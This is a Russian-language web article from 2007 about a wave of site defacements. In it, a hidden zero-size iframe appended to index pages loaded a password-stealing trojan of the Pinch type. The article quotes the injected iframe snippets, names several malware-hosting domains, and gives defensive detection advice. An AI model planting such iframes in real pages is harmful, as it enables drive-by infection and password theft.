Главная сайта | Форум | Фотоальбом | Регистрация   | Вход | Cайт в избранное | Правила сайта и форума

Приветствую Вас Гость | RSS | Telegram канал


Фильмы | Онлайн Видео | Софт | Новости и Статьи | Игры онлайн | Фотоальбом | Форум

ДЛЯ ПРОСМОТРА САЙТА РЕКОМЕНДУЕТСЯ ИСПОЛЬЗОВАТЬ:  Uran - браузер от uCoz на базе проекта Chromium. | Google ChromeOpera | Firefox 


МЕНЮ САЙТА

ПОИСК ПО САЙТУ

Gamesblender № 722: народные GeForce 50, подорожание консолей и ролевая свобода в The Outer Worlds 2

Лучшие космические игры 2025 года - новые релизы и крупные обновления

Elite Dangerous: Trailblazers (Первопроходцы) - Большое предстоящее обновление

Gamesblender 675: новый шутер от Valve, Stellar Blade на ПК и ускоренный ИИ на GeForce RTX

Gamesblender № 674: новые боссы PlayStation, опасная стратегия Microsoft и ассасины в Японии

Gamesblender № 673: внезапная Hades II, закрытие студий Bethesda и контроль видеоигр в России

Gamesblender № 661: будущее Xbox, новая игра авторов Ori, «неправильная» Subnautica 2 и прощание с Dead Cells

Gamesblender № 660: «портативки» от Sony и Microsoft, эксклюзивы Xbox на PlayStation, сделка Epic и Disney и показ Final Fantasy VII Rebirth

Tekken 8: 10 аниме из 10

Gamesblender № 659: Death Stranding 2 и другие показы State of Play, новый президент Blizzard, отмена Deus Ex и перенос «Смуты»

Календарь Игромании: Ноябрь 2015 (Fallout 4, Rise Of The Tomb Raider, Need For Speed)

Игромания! Игровые новости, 24 апреля (Battlefront 2, Киберспорт, Code Vein, Ancestors)

Игромания! ИГРОВЫЕ НОВОСТИ, 1 июля (Epic Games Store, Borderlands 3, Google Stadia, Psychonauts 2)

Игромания! Игровые новости, 19 сентября (Tokyo Game Show, League of Legends, CS: GO, BioShock)

Во что поиграть на этой неделе — 3 мая + Лучшие скидки на игры

Во что поиграть на этой неделе — 8 июня + Лучшие скидки на игры

Игромания! Игровые новости, 4 апреля (Blizzard, Grand Theft Auto 6, Shadow of Mordor 2)

Во что поиграть на этой неделе — 10 мая + Лучшие скидки на игры
СТАТИСТИКА
Всего материалов:
Фильмомания: 1515
Видео: 220
Каталог файлов: 95
Каталог статей: 6820
Фотоальбом: 1236
Форум: 1169/8723
Каталог сайтов: 386

Всего зарегистрировано:
Зарегистрировано: 1776
Сегодня: 1
Вчера: 0
За неделю: 2
За месяц: 4

Из них:
Пользователи: 1701
Проверенные: 23
Друзья: 5
Редакторы: 0
Журналисты: 8
В вечном бане: 33
Модераторы: 1
Администраторы: 3

Из них:
Парней 1320
Девушек 454


ON-Line всего: 1
Гостей: 1
Пользователей: 0

Сейчас на сайте:


День Рождения у: otmodema(69), vital(49), Tatyana(50)
ВЫ МОЖЕТЕ ОКАЗАТЬ ПОДДЕРЖКУ ЗА ТРУДЫ, ПОЖЕРТВОВАВ ЛЮБУЮ СУММЫ.

WEBMONEY



Категории каталога

Главная » Статьи » Статьи » Статьи: Общие

Новый троян, похищающий пароли доступа

Новый троян, похищающий пароли доступа и не определяющийся антивирусными программами.
Как бороться с прокатившейся эпидемией изменения
индексных страниц сайтов?
 

Я не зря написал слово "эпидемия". Дело в том, что в конце 2006 - начале 2007 года владельцы сайтов столкнулись с неприятной ситуацией. При открытии индексной страницы сайта (хостинг значение не имеет, платный или бесплатный) на компьютер начинал подгружаться вирус-троян, который антивирусной программой не определялся.
Оказывается, в код страницы были внесены изменения - после завершающего кода конца страницы была добавлена ссылка на сайт-вирусоноситель, с которого собственно и загружался троянец.
Некоторые индексные страницы вообще "стирались", то есть, на них не оставалось ни одного тега, чисто тебе чистый лист бумаги :).
Соответственно прокатилась волна претензий и обвинений к хостерам, из-за "взлома" хостов пользователей. Явление приняло такие масштабы, что впору было обвинять именно хостеров в том, что они допустили похищение баз аккаунтов пользователей и теперь злоумышленники их используют.
Один такой случай, правда, был в прошлом году с valuehost.ru, когда была "утянута" целая база паролей с сервера (за достоверность не ручаюсь), но в теперешней ситуации винить хостеров в заражении индексных страниц несколько преждевременно.

Говорю это на основании собственного опыта, так как я сам убедился, что в один прекрасный день были дефейснуты (хакнуты) индексные страницы этого сайта и бесплатников на narod.ru и nm.ru. Причем, вход на фтп был выполнен с моим аккаунтом и паролем, то есть без брутфорса и подобных вещей.
 Суть вносимых изменений заключается в том, что на странице index.html (или index.php) после завершающего тега '/html' появляется следующий участок кода:
iframe src=http://pynet.ws/col/index.php width="0" height="0" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" и т.д.
Это может быть ссылка на http://www.counter-pr.info/sp_pack/counter/index.php, http://mz0i.info/gera/index.php или iframe src='http://ltds.biz/go.php?id=1781&user_name=sam' width=1 height=1 /iframe или другой сайт

Я намеренно убрал открывающие кавычки и гиперссылку, чтобы Вы не попались на эту ловушку :). Тег iframe, в который заключена ссылка, имеющий значение width="0" и height="0" говорит о том, что Вы не увидите открывающееся окно "левого" сайта, поскольку заданы нулевые координаты этого окна.
Сразу предвижу закономерный вопрос о лохизме и неиспользовании антивируса на компьютере :)) Так вот, антивирусом ДрВеб (DrWeb) лаборатории Данилова пользуюсь уже около 7 лет, претензий к нему не имел, обновляю постоянно. Плюс к этому на компьютере стоит Agnitum Outpost Firewall, который говорит свое веское слово в спорных случаях, типа "программа c:/windows/r.exe запрашивает исходящее соединение ..." и так далее. Таким способом, как я думал, мне удавалось иметь 100% уверенность в завтрашнем дне smile Оказалось, что все не так просто...

Анализ возможного заражения привел к парадоксальному результату. Индексные страницы менялись после того, как я проводил авторегистрацию сайтов в каталогах с помощью программы AllSubmitter. Сама программа, конечно, не виновата, просто в базе данных находились "зараженные" ссылки. Простая логика говорит о том, что в этой базе находится одна или несколько ссылок на сайты, с которых загружается вирус-троян.

Но проблема заключалась не только в паролях доступа к ftp. Кроме того была сделана попытка утянуть пароль на аську-семизначник, который удалось восстановить ретривом. Больше всего подходит под результаты ущерба Trojan типа Pinch, так как он умеет обходить файерволл и антивирусные программы, а "тырит" все, к чему может дотянуться, в том числе пароли, сохраненные в IE, CuteFTP (мой случай), Total Commander и еще десятке различных программ.
Исследование ссылки, которая дописывалась на индексную страницу моего сайта дали возможность предположить, что имеется в виду комплексная атака на компьютер. То есть:
Сначала загружается Trojan-Downloader.VBS. Psyme.fc - троянская программа-загрузчик других троянов. Именно она подгружает еще два вируса - Trojan-PSW.Win32.LdPinch.bik (или модификация) и Trojan.Win32.Agent.oh (не обязательно).

Самое интересное, что как ДрВеб, бывший на компьютере, так и впоследствии скачанный и установленный после него Антивирус KAV, определяли, что на компьютер закачивается троян и его ликвидировали. Вроде... На самом деле, это мог быть просто известный троян, который служил ширмой.
Еще один ньюанс: с самого начала загрузки файлов с зараженного сайта на рабочем столе мог создаваться и выполнялся файл new.exe (его копия могла создаваться в папке Temp и папке интернет-обозревателя - в моем случае Maxthon). В папке Виндовс появлялись файлы названиями r.exe или c.exe, которые антивирусом не опознавались как опасные.
По свидетельствам других пользователей в папке Windows мог создаваться поддельный файл с названием svchost.exe (оригинал находится в папке System32). Тогда в процессах операционной системы трудно определить, какой из процессов, используемых программой svchost.exe есть истинный, а какой поддельный.
Но! Существует одно "но" - трояны типа Pinch надежно отлавливаются как Доктор Веб, так и антивирусом Касперского. Вроде отлавливаются... Возможно предположение, что запущена или модификация этого вируса, которая успевает обойти антивирус, или работает другой вирус, который маскируется "Пинчем".
Как видим, прослеживается четкая тенденция - заражение индексной страницы, закачка на компьютер трояна-даунлоадера, закачка этим трояном одного или нескольких троянцев, которые похищают пароли, передача паролей злоумышленнику.

Такая передача может идти как через почтовый клиент (отправляется письмо на горячий мейл), так и через командную строку Internet Explorer (антивирусом не определяется). Вполне возможно, что троян мог использовать и имеющийся фтп-клиент для того, чтобы модифицировать индексную страницу. Вариантов здесь множество.
Одно замечание: в моем случае действие трояна можно было заметить по тому, что была запущена служба Telnet и удаленное управление рабочим столом, так же как и удаленный доступ к реестру. Можете проверить прямо сейчас, зайдите через "Панель управления/Администрирование" в список служб, и если они у Вас работают, отключите
Существовал еще один вариант, почему не определялся вирус, причем, достаточно вероятный. Используемая программа-троян могла принадлежать к руткитам (программам, внедряемым в ядро операционной системы), которые трудно обнаруживаются антивирусами. Или используется уязвимость Интернет Эксплорер версии 6 (Internet Explorer 6). Вот как о ней писалось: Удаленный пользователь может с помощью специально сформированной Web страницы загрузить на удаленную систему произвольный HTA файл и затем выполнить его с привилегиями пользователя, запустившего браузер. Удачная эксплуатация уязвимости позволит злоумышленнику выполнить произвольный код на целевой системе.
Спрашивается, что делать? Первое, проверьте свои сайты, если при открытии индексной страницы Ваш антивирус скажет, что выполняется или загружается троян, Вы заразились. Если даже и ничего не произойдет, просмотрите HTML-код, на предмет присутствия после тега '/html' внедренного тега 'iframe' с атрибутами "width="0" height="0" или width="1" height="1".
Если с Вами произошла эта неприятность, то как от нее избавиться читайте на странице:
Очистка операционной системы от вирусов, троянов и программ-шпионов

Так как поиск уязвимостей хакерами ориентирован на Internet Explorer, есть и компромиссный вариант: использовать альтернативный браузер, не базирующийся на платформе IE. Это Firefox (огненная лиса) на движке Mozilla. Ознакомиться с ним Вы можете по баннеру ниже:

Вы можете попробовать новый быстрый браузер Mozilla Firefox — это браузер, обладающий функцией блокировки всплывающих окон и просмотра страниц на вкладках, а также функциями безопасности и конфиденциальности. В браузер Firefox интегрирована панель инструментов Google, чтобы предоставить пользователям еще больше полезных функций: поиск в Google, проверку правописания и автозаполнение.
Установите и попробуйте - Вы не потеряете ничего. А вот если Mozilla Firefox оправдает Ваши ожидания, тогда забудете про все проблемы, связанные с осликом ИЕ.
Новую информацию об этой теме можете прочитать на странице

Если на странице вы заметили в посте отсутствие изображений, просьба сообщить , нажав на кнопку.



После прочтения материала " Новый троян, похищающий пароли доступа ", можно просмотреть форум и поискать темы по данной игре.



ДРУГИЕ МАТЕРИАЛЫ
ICQ рассылает нового "трояна"
Чистый воздух в доме
Прозрачный алюминий
E3 2009: анонс Castlevania: Lords of Shadow
Безопасность: Как играть в безопасной среде
AMD выпустила свою первую серверную платформу
Провайдеры запретят нелегальное скачивание из Сети?
Рассмотрение Microsoft Windows 7 User Account Control (UAC)
Как помириться с любимым
MSI NX8800GT Zilent стали холоднее, тише и еще круче
Самые оригинальные вредители 2007 года
Проблема космического мусора все более актуальна
Доведи своего парня до безумия глубоким минетом!
Штраф в $1,9 млн за 24 песни
Пошаговое руководство по настройке и отслеживанию производительности системы в Windows Vista - (стр 1)
25 вещей, которые ты обязательно услышишь
Российская РС-версия Resident Evil 5 находится в печати
Официальные изображения Radeon HD 5870/5850 от Sapphire
DirectAccess: Последнее VPN-решение от Microsoft - часть 1: Обзор существующих решений для удаленного доступа
Защитите свой ПК с помощью новых функций безопасности в Windows Vista

Если вам понравился материал "Новый троян, похищающий пароли доступа", - поделитесь ним с другими.


html-cсылка на публикацию
BB-cсылка на публикацию
Прямая ссылка на публикацию


Категория: Статьи: Общие | Добавил: Фокусник (14.08.2007)
Просмотров: 4127

Ниже вы можете добавить комментарии к материалу " Новый троян, похищающий пароли доступа "

Внимание: Все ссылки и не относящиеся к теме комментарии будут удаляться. Для ссылок есть форум.


Всего комментариев : 0
avatar
ФОРМА ВХОДА
ПОЖЕРТВОВАНИЯ

WMZ: Z143317192317

Boosty - Donate

Payeer: P48650932
На кофе / ko-fi
На пиво / wayforpay
ПАРТНЕРЫ

World of Warships — это free-to-play ММО-экшен, который позволяет окунуться в мир масштабных военно-морских баталий. Возьмите под управление легендарные боевые корабли первой половины ХХ века и завоюйте господство на бескрайних океанских просторах.

Курсы обмена WebMoney


Что такое ресурс Turbobit и как качать.




Получи 10 ГБ места бесплатно, на всю жизнь.


Boosty – сервис по сбору донатов.
Фильм
Фильм "Пылающий" (2018) - Русский трейлер
Видеообзор игры Dragon Age: Inquisition - Trespasser
Видеообзор игры Dragon Age: Inquisition - Trespasser
ЭКСКЛЮЗИВ: Правильный DOOM (Превью)
ЭКСКЛЮЗИВ: Правильный DOOM (Превью)
Семён Слепаков- Трусы
Семён Слепаков- Трусы
Gamesblender №315: новый проект Bioware, подробности Beyond Good & Evil 2 и Monster Hunter на ПК
Gamesblender №315: новый проект Bioware, подробности Beyond Good & Evil 2 и Monster Hunter на ПК
Фильм
Фильм "Талли" (2018) - Русский трейлер #2
День независимости 3 [Обзор] / [Трейлер на русском]
День независимости 3 [Обзор] / [Трейлер на русском]
Тодд Говард о Starfield и Fallout 76, убийственный рекорд Fortnite, игра от авторов Detention
Тодд Говард о Starfield и Fallout 76, убийственный рекорд Fortnite, игра от авторов Detention
Gamesblender № 191
Gamesblender № 191
На районе — Трейлер (2018)
На районе — Трейлер (2018)

Ночной позитив: смешные картинки и фото (38 шт)
Ночной позитив: смешные картинки и фото (38 шт)
Сюрреалистические фотоманипуляции Зака Изи (31 фото)
Сюрреалистические фотоманипуляции Зака Изи (31 фото)
Героические животные, спасшие жизни людей
Героические животные, спасшие жизни людей
Если бы животные были гигантских размеров (16 фото)
Если бы животные были гигантских размеров (16 фото)
15 фотографий спасённых от бездомной жизни животных, которые вернут вам веру в человечество
15 фотографий спасённых от бездомной жизни животных, которые вернут вам веру в человечество
Сборник демотиваторов для настроения (15 фото)
Сборник демотиваторов для настроения (15 фото)
Прикольные снимки из аэропорта
Прикольные снимки из аэропорта
Потрясающие песочные скульптуры (16 фото)
Потрясающие песочные скульптуры (16 фото)
СТАТИСТИКА
Яндекс.Метрика


Copyright © 2000-2025, Alex LTD and System PervertedХостинг от uCoz